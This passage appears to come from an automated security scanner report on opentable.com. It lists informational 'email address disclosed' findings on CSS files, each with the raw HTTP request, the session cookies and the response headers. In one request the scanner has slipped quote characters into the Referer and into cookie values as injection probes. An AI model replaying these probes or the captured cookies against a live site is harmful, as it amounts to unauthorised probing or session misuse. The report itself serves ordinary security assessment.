Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 995
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:57 GMT

....NationalRoundupSection{background-color:#fffff1;float:left;width:945px;}.NationalRoundupTitle{font-family:Verdana,Arial,Helvetica,sans-serif;font-size:16px;font-weight:bold;text-align:center;paddi
...[SNIP]...
20.243. http://www.opentable.com/styles/RestaurantProfile.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/RestaurantProfile.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/RestaurantProfile.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 39215
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:55:06 GMT

...#RestSearch_SearchPanel{background-color:#cad6a8;float:left;margin:31px 0 0 0;padding:0;width:420px;}#StepTwoBody{float:left;margin:0;width:400px;background-color:#cad6a8;}#ProfileMainModule{float:
...[SNIP]...
20.244. http://www.opentable.com/styles/SearchControl.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/SearchControl.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/SearchControl.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 35649
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:12 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:51 GMT

... #ResultsMainModule #SearchNav_divNavSimpleSearchPanelOne{display:none;}#ResultsMainModule #SearchNav_divNavSimpleSearchVertDivider{display:none;}.SearchBar .BubbleUpMessage{padding:0 0 5px 15px;fo
...[SNIP]...
20.245. http://www.opentable.com/styles/dimensions.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/dimensions.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/dimensions.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1398
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:04 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:55:04 GMT

... .fourColOne,.fourColTwo,.fourColTwoAuto,.fourColThree,.fourColFour,.fiveColOne,.fiveColTwo,.fiveColThree,.fiveColFour,.fiveColFive{margin:0 0 15px 15px;padding:0;overflow-x:hidden;}.fourColOne{wid
...[SNIP]...
20.246. http://www.opentable.com/styles/dipProgram.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/dipProgram.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/dipProgram.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 26050
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:04 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:29 GMT

...#ResultsMainModule{margin:0;padding:0;float:left;display:block;text-align:left;width:980px;position:relative;}.NavSimpleSearch{border-bottom:1px dashed #ccc;}#HorizatalDivider{float:left;background
...[SNIP]...
20.247. http://www.opentable.com/styles/form_elements.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/form_elements.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/form_elements.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 15518
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:06 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:55 GMT

...button.findTable{border:0;cursor:pointer;font-weight:bold;padding:0 8px 0 0;text-align:center;background:url("/img/buttonsNew/primary_button_on_right.png") no-repeat right;font-size:12px;}button.fi
...[SNIP]...
20.248. http://www.opentable.com/styles/home.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/home.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/home.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 7256
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:06 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:42 GMT

...#TopNav{border-bottom:none;}a.mainmarket:link,a.mainmarket:visited,a.mainmarket:hover,a.mainmarket:active,a.mainmarket.wider:link,a.mainmarket.wider:visited,a.mainmarket.wider:hover,a.mainmarket.wi
...[SNIP]...
20.249. http://www.opentable.com/styles/interim.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/interim.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/interim.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 553
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:06 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:45 GMT

... .InterimWrap{width:100%;height:100%;}.InterimContainer{position:absolute;top:50%;left:0;width:100%;height:1px;overflow:visible;}.InterimContentDisplay{width:550px;height:200px;margin-left:-275px;p
...[SNIP]...
20.250. http://www.opentable.com/styles/iphone.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/iphone.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/iphone.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 212
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:06 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:17 GMT

... #TopNav #TopText #TopNav_lblTopText{font-size:98%!important;}h2.featuredHeader{font-size:70%!important;}#lblMakeReservation.lblMakeReservation,#lblFreeInstantConfirmed.lblFreeInstantConfirmed{font
...[SNIP]...
20.251. http://www.opentable.com/styles/ot_style123.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/ot_style123.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/ot_style123.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 17770
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:55 GMT

body{background-color:#867F75;text-align:center;margin-top:20px;font-family:Verdana,Arial,Sans-Serif;}td{font-size:13px;color:#5B4B3E;}td a,a:visited{text-decoration:underline;font-size:13px;}td a:hov
...[SNIP]...
20.252. http://www.opentable.com/styles/plainPages.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/plainPages.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/plainPages.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen'?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; s_cc=true; s_nr=1317646516907-New; s_sq=%5B%5BB%5D%5D; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; pgseq="

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2640
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:56:41 GMT

... #TopNav{margin:0 0 0 0!important;}#Global{margin-top:20px;}.innerWrapper{margin-top:0;background-color:#fefcf7;}#infoPages{float:left;text-align:left;margin:15px 30px 0 30px;padding:0;display:bloc
...[SNIP]...
20.253. http://www.opentable.com/styles/searchModule.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/searchModule.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/searchModule.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2604
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:12 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:48 GMT

... #imageCal table{font-size:12px;width:150px;font-family:arial;font-weight:bold;background:#FFF;}#imageCal td{padding:0;text-align:center;}a.clickableDays,a:hover.clickableDays,a:visited.clickableDa
...[SNIP]...
20.254. http://www.opentable.com/styles/thickbox.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/thickbox.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/thickbox.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2614
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:14 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:43 GMT

#TB_window{font:12px Arial,Helvetica,sans-serif;color:#322B22;}#TB_secondLine{font:10px Arial,Helvetica,sans-serif;color:#666;}#TB_overlay{position:fixed;z-index:100;top:0;left:0;height:100%;width:100
...[SNIP]...
20.255. http://www.opentable.com/styles/white/OpenTablesAB.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/white/OpenTablesAB.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/white/OpenTablesAB.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 17362
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:16 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:52 GMT

... #ResultsMainModule{margin:0 0 0 10px;padding:0;float:left;display:block;text-align:left;width:453px;position:relative;}.restImage{width:245px!important;height:265px!important;float:left;margin:25p
...[SNIP]...
20.256. http://www.opentable.com/styles/white/topandbot.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/white/topandbot.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/white/topandbot.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 4840
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:18 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:45 GMT

... body{font-family:Verdana,Arial,Hevetica,Sans-Serif;color:#42382c;}#SearchForm{width:760px;}#Global{margin:0 auto;width:760px;}.innerWrapper{margin:15px auto;float:left;padding-bottom:25px;backgrou
...[SNIP]...
20.257. http://www.opentable.com/styles/white/topandbot_old.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/white/topandbot_old.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/white/topandbot_old.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
